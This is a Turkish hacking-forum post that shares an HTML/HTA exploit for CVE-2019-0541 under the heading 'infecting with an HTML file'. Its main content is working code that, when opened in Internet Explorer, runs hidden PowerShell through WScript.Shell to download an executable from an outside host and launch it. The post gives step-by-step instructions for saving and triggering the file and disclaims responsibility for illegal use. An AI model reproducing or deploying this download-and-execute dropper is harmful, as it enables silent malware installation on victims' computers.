HTML Exploit [ POP-UP ] CVE-2019-0541

R3X · 22 May 2019

[ HTML DOSYASI VIRUS BULASTIRMA ]HTML Exploit [ POP-UP ] CVE-2019-0541

Öncelikle Herkese merhabalar Piyasada yeni bulunan bir exploiti paylaşacagım. Daha önce THT De Paylaşılmamış olması gerekiyor. Ve sizin bunu görmeye ihtiyacınız oldugunu düşüyorum.
Öncelikle İllegal amaçlarla Kullanılması ne TurkHackTeam.org nede Konuyu Paylaşan Kendi şahsımı kesinlikle ilgilendirmez. İllegal yada Legal kullanımda tüm sorumluluk size aittir.Bu Konu sadece zaafiyet bildirisi içindir.

Kod:

<html> <head><**** name=ProgId content=htafile> </head> <hta:application id=x> <script> try { if (x.commandLine != "") { new ActiveXObject("Wscript.Shell").Run('powershell -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile(https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe,%TEMP%\putty.exe); Start-Process %TEMP%\putty.exe') } } catch(ex) { alert('Error: This ******** must be viewed in "Edit" mode: Right-click it, then select the "Edit" menu option. \n If not present, open it with MS IE, make sure the "Menu" bar is displayed, then click "File" menu and then "Edit with...".'); } </script> <noscript> Error: This ******** must be viewed in "Edit" mode: Right-click it, then select the "Edit" menu option. <br> If not present, open it with MS IE, make sure the "Menu" bar is displayed, then click "File" menu and then "Edit with...". </noscript> </html>

Kodu Kopyalayın. Not defterine yapıştırın ve farklı kaydet olarak "örnek.htm" Kaydedin.
Internet Explorer Ile Açtıgınızda Aşşada Eklenti Aktifleştir çıkacak buna tıkladıgınızda Putty Açılacaktır. Kodlar gayet basittir.

Spyral Scanner : https://spyralscanner.net/result.php?id=t9a5TyGh6h

HTML Exploit [ POP-UP ] CVE-2019-0541

R3X

Katılımcı Üye

Sosyal medya sayfalarımız